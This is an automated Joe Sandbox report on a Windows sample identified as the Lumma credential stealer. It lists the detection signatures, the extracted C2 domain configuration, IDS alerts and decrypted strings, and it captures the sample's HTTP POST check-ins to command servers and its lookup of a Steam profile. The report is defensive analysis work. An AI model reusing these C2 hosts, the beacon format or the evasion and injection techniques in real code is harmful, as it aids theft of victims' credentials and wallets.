Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe

Overview

General Information

Sample name:SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
Analysis ID:1532746
MD5:de577c633508c2bc5e7be2ad04bf34f3
SHA1:7a88fa2b07e7ef10de364579235e37d40be949ed
SHA256:84f11a69fc5ab994993203b7e262203b9a86e943a233a932f7230c98b86740f1
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["caffegclasiqwp.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "millyscroqwp.shop", "nippydxmnwquo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop"], "Build id": "XWVnVB--land1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.BitLockerToGo.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          2.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.689769+020020546531A Network Trojan was detected192.168.2.749707188.114.96.3443TCP
            2024-10-13T21:34:56.217981+020020546531A Network Trojan was detected192.168.2.749709104.21.53.8443TCP
            2024-10-13T21:34:57.441465+020020546531A Network Trojan was detected192.168.2.749712104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.799618+020020554741A Network Trojan was detected192.168.2.7525601.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.740374+020020554751A Network Trojan was detected192.168.2.7636541.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.753153+020020554771A Network Trojan was detected192.168.2.7557311.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.712514+020020554791A Network Trojan was detected192.168.2.7627541.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.764790+020020554801A Network Trojan was detected192.168.2.7496381.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.776070+020020554811A Network Trojan was detected192.168.2.7546981.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.788496+020020554821A Network Trojan was detected192.168.2.7649451.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.724743+020020554831A Network Trojan was detected192.168.2.7622601.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:53.689769+020020498361A Network Trojan was detected192.168.2.749707188.114.96.3443TCP
            2024-10-13T21:34:56.217981+020020498361A Network Trojan was detected192.168.2.749709104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:57.441465+020020498121A Network Trojan was detected192.168.2.749712104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-13T21:34:55.109408+020028586661Domain Observed Used for C2 Detected192.168.2.749708104.102.49.254443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: locatedblsoqp.shopURL Reputation: Label: phishing
            Source: caffegclasiqwp.shopURL Reputation: Label: malware
            Source: condedqpwqm.shopURL Reputation: Label: phishing
            Source: millyscroqwp.shopURL Reputation: Label: malware
            Source: stamppreewntnq.shopURL Reputation: Label: phishing
            Source: stagedchheiqwo.shopURL Reputation: Label: phishing
            Source: traineiwnqo.shopURL Reputation: Label: malware
            Source: https://locatedblsoqp.shop/apiURL Reputation: Label: malware
            Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
            Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
            Found malware configuration
            Source: 2.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["caffegclasiqwp.shop", "traineiwnqo.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "millyscroqwp.shop", "nippydxmnwquo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop"], "Build id": "XWVnVB--land1"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: nippydxmnwquo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: nippydxmnwquo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: caffegclasiqwp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: stamppreewntnq.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: stagedchheiqwo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: millyscroqwp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: evoliutwoqm.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: condedqpwqm.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: traineiwnqo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: locatedblsoqp.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: nippydxmnwquo.shop
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString decryptor: XWVnVB--land1
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49712 version: TLS 1.2
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+1Ch]2_2_0040C000
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0040B810
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]2_2_0043BC78
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]2_2_0040CC80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]2_2_0040C69D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]2_2_00413846
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000874h]2_2_0041E850
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041E850
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041F862
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]2_2_0043A830
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_004390C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0043E8D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043E080
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_00413888
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041F8B7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041F8B7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0041D940
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00431950
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00415172
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00415172
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [ebp-24h]2_2_00415172
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [ebx]2_2_0043F9E0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h2_2_004211B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00413A50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]2_2_0042A2DC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]2_2_0042A2DC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]2_2_0042A2DC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+18h]2_2_0042A2DC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh2_2_0042A2DC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_004122E6
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043F290
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00427B30
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00423BE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], ax2_2_0041DBEA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043E390
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0043D470
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043DC70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_0041C400
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]2_2_0041E411
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004104D1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+38h]2_2_0040F578
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx2_2_0041CDED
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx+01h], 00000000h2_2_0041CDED
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00424640
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041C660
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_00415E62
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000D8h]2_2_0042866E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00403E70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000874h]2_2_0041E6C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041E6C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00423F07
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043DF90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx2_2_0043A796

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2055480 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) : 192.168.2.7:49638 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.7:64945 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055477 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) : 192.168.2.7:55731 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055481 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop) : 192.168.2.7:54698 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.7:63654 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055474 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop) : 192.168.2.7:52560 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:62754 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:62260 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49708 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49709 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49709 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49707 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49707 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49712 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49712 -> 104.21.53.8:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: caffegclasiqwp.shop
            Source: Malware configuration extractorURLs: traineiwnqo.shop
            Source: Malware configuration extractorURLs: stamppreewntnq.shop
            Source: Malware configuration extractorURLs: stagedchheiqwo.shop
            Source: Malware configuration extractorURLs: condedqpwqm.shop
            Source: Malware configuration extractorURLs: millyscroqwp.shop
            Source: Malware configuration extractorURLs: nippydxmnwquo.shop
            Source: Malware configuration extractorURLs: evoliutwoqm.shop
            Source: Malware configuration extractorURLs: locatedblsoqp.shop
            Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nippydxmnwquo.shop
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: sergei-esenin.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :bContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b2c26a1103d97c5dd06069b2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 13 Oct 2024 19:34:55 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control,& equals www.youtube.com (Youtube)
